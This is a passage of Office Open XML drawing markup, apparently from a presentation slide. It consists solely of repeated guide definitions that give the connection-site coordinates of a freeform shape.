              <a:gd name="connsiteY108" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 486968 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 2182937 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 442619 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1910499 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 446785 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1903212 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY17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08019 w 1605470"/>
              <a:gd name="connsiteY42" fmla="*/ 5385461 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 622750 w 1605470"/>
              <a:gd name="connsiteY43" fmla="*/ 5363084 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 638731 w 1605470"/>
              <a:gd name="connsiteY44" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 672224 w 1605470"/>
              <a:gd name="connsiteY45" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 681823 w 1605470"/>
              <a:gd name="connsiteY46" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 693049 w 1605470"/>
              <a:gd name="connsiteY47" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 694069 w 1605470"/>
              <a:gd name="connsiteY48" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 701410 w 1605470"/>
              <a:gd name="connsiteY49" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 704713 w 1605470"/>
              <a:gd name="connsiteY50" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 705697 w 1605470"/>
              <a:gd name="connsiteY51" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 701331 w 1605470"/>
              <a:gd name="connsiteY52" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 708008 w 1605470"/>
              <a:gd name="connsiteY53" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 704941 w 1605470"/>
              <a:gd name="connsiteY54" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 711771 w 1605470"/>
              <a:gd name="connsiteY55" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 718807 w 1605470"/>
              <a:gd name="connsiteY56" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 721538 w 1605470"/>
              <a:gd name="connsiteY57" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 718242 w 1605470"/>
              <a:gd name="connsiteY58" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 719796 w 1605470"/>
              <a:gd name="connsiteY59" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 726705 w 1605470"/>
              <a:gd name="connsiteY60" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 722561 w 1605470"/>
              <a:gd name="connsiteY61" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 724935 w 1605470"/>
              <a:gd name="connsiteY62" fmla="*/ 4821504 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 732118 w 1605470"/>
              <a:gd name="connsiteY63" fmla="*/ 4801535 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 739787 w 1605470"/>
              <a:gd name="connsiteY64" fmla="*/ 4797794 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 741081 w 1605470"/>
              <a:gd name="connsiteY65" fmla="*/ 4784526 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 742865 w 1605470"/>
              <a:gd name="connsiteY66" fmla="*/ 4781211 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 751652 w 1605470"/>
              <a:gd name="connsiteY67" fmla="*/ 4761984 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 747700 w 1605470"/>
              <a:gd name="connsiteY68" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 743180 w 1605470"/>
              <a:gd name="connsiteY69" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 738263 w 1605470"/>
              <a:gd name="connsiteY70" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 756542 w 1605470"/>
              <a:gd name="connsiteY71" fmla="*/ 4350346 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 715481 w 1605470"/>
              <a:gd name="connsiteY72" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 719554 w 1605470"/>
              <a:gd name="connsiteY73" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 704810 w 1605470"/>
              <a:gd name="connsiteY74" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 705959 w 1605470"/>
              <a:gd name="connsiteY75" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 704535 w 1605470"/>
              <a:gd name="connsiteY76" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 700443 w 1605470"/>
              <a:gd name="connsiteY77" fmla="*/ 4010511 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 698282 w 1605470"/>
              <a:gd name="connsiteY78" fmla="*/ 3998331 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 690830 w 1605470"/>
              <a:gd name="connsiteY79" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 692428 w 1605470"/>
              <a:gd name="connsiteY80" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 685850 w 1605470"/>
              <a:gd name="connsiteY81" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 687181 w 1605470"/>
              <a:gd name="connsiteY82" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 691535 w 1605470"/>
              <a:gd name="connsiteY83" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 696613 w 1605470"/>
              <a:gd name="connsiteY84" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 719207 w 1605470"/>
              <a:gd name="connsiteY85" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 718632 w 1605470"/>
              <a:gd name="connsiteY86" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 718939 w 1605470"/>
              <a:gd name="connsiteY87" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 718966 w 1605470"/>
              <a:gd name="connsiteY88" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 717581 w 1605470"/>
              <a:gd name="connsiteY89" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 716465 w 1605470"/>
              <a:gd name="connsiteY90" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 718198 w 1605470"/>
              <a:gd name="connsiteY91" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 721941 w 1605470"/>
              <a:gd name="connsiteY92" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 721407 w 1605470"/>
              <a:gd name="connsiteY93" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 730103 w 1605470"/>
              <a:gd name="connsiteY94" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 737449 w 1605470"/>
              <a:gd name="connsiteY95" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 736745 w 1605470"/>
              <a:gd name="connsiteY96" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 740188 w 1605470"/>
              <a:gd name="connsiteY97" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 747726 w 1605470"/>
              <a:gd name="connsiteY98" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 774383 w 1605470"/>
              <a:gd name="connsiteY99" fmla="*/ 3381564 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 774870 w 1605470"/>
              <a:gd name="connsiteY100" fmla="*/ 3375761 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 770510 w 1605470"/>
              <a:gd name="connsiteY101" fmla="*/ 3361844 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 767933 w 1605470"/>
              <a:gd name="connsiteY102" fmla="*/ 3356929 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 766158 w 1605470"/>
              <a:gd name="connsiteY103" fmla="*/ 3349058 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 766414 w 1605470"/>
              <a:gd name="connsiteY104" fmla="*/ 3348763 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 764166 w 1605470"/>
              <a:gd name="connsiteY105" fmla="*/ 3341588 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 749397 w 1605470"/>
              <a:gd name="connsiteY106" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 766960 w 1605470"/>
              <a:gd name="connsiteY107" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 767385 w 1605470"/>
              <a:gd name="connsiteY108" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 769208 w 1605470"/>
              <a:gd name="connsiteY109" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 770350 w 1605470"/>
              <a:gd name="connsiteY110" fmla="*/ 3216125 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 756043 w 1605470"/>
              <a:gd name="connsiteY111" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 756544 w 1605470"/>
              <a:gd name="connsiteY112" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 744144 w 1605470"/>
              <a:gd name="connsiteY113" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 739378 w 1605470"/>
              <a:gd name="connsiteY114" fmla="*/ 3147669 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 734648 w 1605470"/>
              <a:gd name="connsiteY115" fmla="*/ 3145733 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 729329 w 1605470"/>
              <a:gd name="connsiteY116" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 729994 w 1605470"/>
              <a:gd name="connsiteY117" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 720862 w 1605470"/>
              <a:gd name="connsiteY118" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 707471 w 1605470"/>
              <a:gd name="connsiteY119" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 680201 w 1605470"/>
              <a:gd name="connsiteY120" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 622815 w 1605470"/>
              <a:gd name="connsiteY121" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 571733 w 1605470"/>
              <a:gd name="connsiteY122" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 551827 w 1605470"/>
              <a:gd name="connsiteY123" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 542550 w 1605470"/>
              <a:gd name="connsiteY124" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 529511 w 1605470"/>
              <a:gd name="connsiteY125" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 528878 w 1605470"/>
              <a:gd name="connsiteY126" fmla="*/ 2408971 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 535510 w 1605470"/>
              <a:gd name="connsiteY127" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 538122 w 1605470"/>
              <a:gd name="connsiteY128" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 514451 w 1605470"/>
              <a:gd name="connsiteY129" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 486968 w 1605470"/>
              <a:gd name="connsiteY130" fmla="*/ 2182937 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 488555 w 1605470"/>
              <a:gd name="connsiteY131" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 486013 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 487006 w 1605470"/>
              <a:gd name="connsiteY133" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 478812 w 1605470"/>
              <a:gd name="connsiteY134" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 442619 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1910499 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 446785 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1903212 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX150" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY150" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX151" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY151" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX152" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY152" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX153" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY153" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX154" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY154" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX155" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 263226 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 204576 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 219064 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 167079 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY17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63084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56542 w 1605470"/>
              <a:gd name="connsiteY70" fmla="*/ 4350346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46785 w 1605470"/>
              <a:gd name="connsiteY135" fmla="*/ 1903212 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 436547 w 1605470"/>
              <a:gd name="connsiteY136" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 390346 w 1605470"/>
              <a:gd name="connsiteY137" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 362657 w 1605470"/>
              <a:gd name="connsiteY138" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 361783 w 1605470"/>
              <a:gd name="connsiteY139" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 342578 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 355658 w 1605470"/>
              <a:gd name="connsiteY141" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 348400 w 1605470"/>
              <a:gd name="connsiteY142" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 334485 w 1605470"/>
              <a:gd name="connsiteY143" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY144" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX145" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY145" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX146" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY146" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX147" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY147" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX148" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY148" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX149" fmla="*/ 318989 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1016103 h 6858000"/>
